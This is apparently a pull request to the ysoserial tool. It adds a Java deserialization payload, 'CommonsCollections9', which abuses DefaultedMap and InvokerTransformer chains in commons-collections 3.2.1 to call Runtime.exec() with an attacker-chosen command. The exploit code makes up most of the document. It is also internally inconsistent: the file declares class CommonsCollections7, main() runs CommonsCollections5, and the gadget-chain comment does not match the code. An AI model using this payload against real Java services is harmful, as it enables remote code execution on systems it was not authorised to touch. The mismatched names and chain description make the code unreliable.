### PR TITLE
CommonsCollections9 payload

### DIFF
--- a/src/main/java/ysoserial/payloads/CommonsCollections9.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections9.java
@@ -1,0 +1,102 @@
+package ysoserial.payloads;
+
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.Map;
+
+import javax.management.BadAttributeValueExpException;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+
+import org.apache.commons.collections.map.DefaultedMap;
+
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.annotation.PayloadTest;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.JavaVersion;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/*
+	Gadget chain:
+		ObjectInputStream.readObject()
+			AnnotationInvocationHandler.readObject()
+				Map(Proxy).entrySet()
+					AnnotationInvocationHandler.invoke()
+						DefaultedMap.get()
+							ChainedTransformer.transform()
+								ConstantTransformer.transform()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Class.getMethod()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Runtime.getRuntime()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Runtime.exec()
+
+	Requires:
+		commons-collections
+ */
+/*
+This only works in JDK 8u76 and WITHOUT a security manager
+
+https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
+ */
+//@PayloadTest(skip="need more robust way to detect Runtime.exec() without SecurityManager()")
+@SuppressWarnings({"rawtypes", "unchecked"})
+@PayloadTest ( precondition = "isApplicableJavaVersion")
+@Dependencies({"commons-collections:commons-collections:3.2.1"})
+@Authors({ Authors.MEIZJM3I})
+public class CommonsCollections7 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
+
+    public BadAttributeValueExpException getObject(final String command) throws Exception {
+        final String[] execArgs = new String[] { command };
+        // inert chain for setup
+        final Transformer transformerChain = new ChainedTransformer(
+            new Transformer[]{ new ConstantTransformer(1) });
+        // real chain for after setup
+        final Transformer[] transformers = new Transformer[] {
+            new ConstantTransformer(Runtime.class),
+            new InvokerTransformer("getMethod", new Class[] {
+                String.class, Class[].class }, new Object[] {
+                "getRuntime", new Class[0] }),
+            new InvokerTransformer("invoke", new Class[] {
+                Object.class, Object[].class }, new Object[] {
+                null, new Object[0] }),
+            new InvokerTransformer("exec",
+                new Class[] { String.class }, execArgs),
+            new ConstantTransformer(1) };
+
+        final Map innerMap = new HashMap();
+        final Map defaultedmap = DefaultedMap.decorate(innerMap, transformerChain);
+
+        TiedMapEntry entry = new TiedMapEntry(defaultedmap, "foo");
+
+        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
+        Field valfield = val.getClass().getDeclaredField("val");
+        valfield.setAccessible(true);
+        valfield.set(val, entry);
+
+        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
+
+        return val;
+    }
+
+    public static void main(final String[] args) throws Exception {
+        PayloadRunner.run(CommonsCollections5.class, args);
+    }
+
+    public static boolean isApplicableJavaVersion() {
+        return JavaVersion.isBadAttrValExcReadObj();
+    }
+
+}

--- a/src/main/java/ysoserial/payloads/annotation/Authors.java
+++ b/src/main/java/ysoserial/payloads/annotation/Authors.java
@@ -23,6 +23,7 @@ public @interface Authors {
     String SCRISTALLI = "scristalli";
     String HANYRAX = "hanyrax";
     String EDOARDOVIGNATI = "EdoardoVignati";
+    String MEIZJM3I = "meizjm3i";
 
     String[] value() default {};
 


### PR DESCRIPTION
It use another map class which named DefaultedMap to complete the gadget.
The gadget chain when use DefaultedMap is similar to  LazyMap, so I write the code based on the LazyMap's payload.
When I broswing the pull requests records, find a record which add the CommonsCollections 8 payload, so I named the DefaultedMap to CommonsCollections9.

Thank you.
Best regards.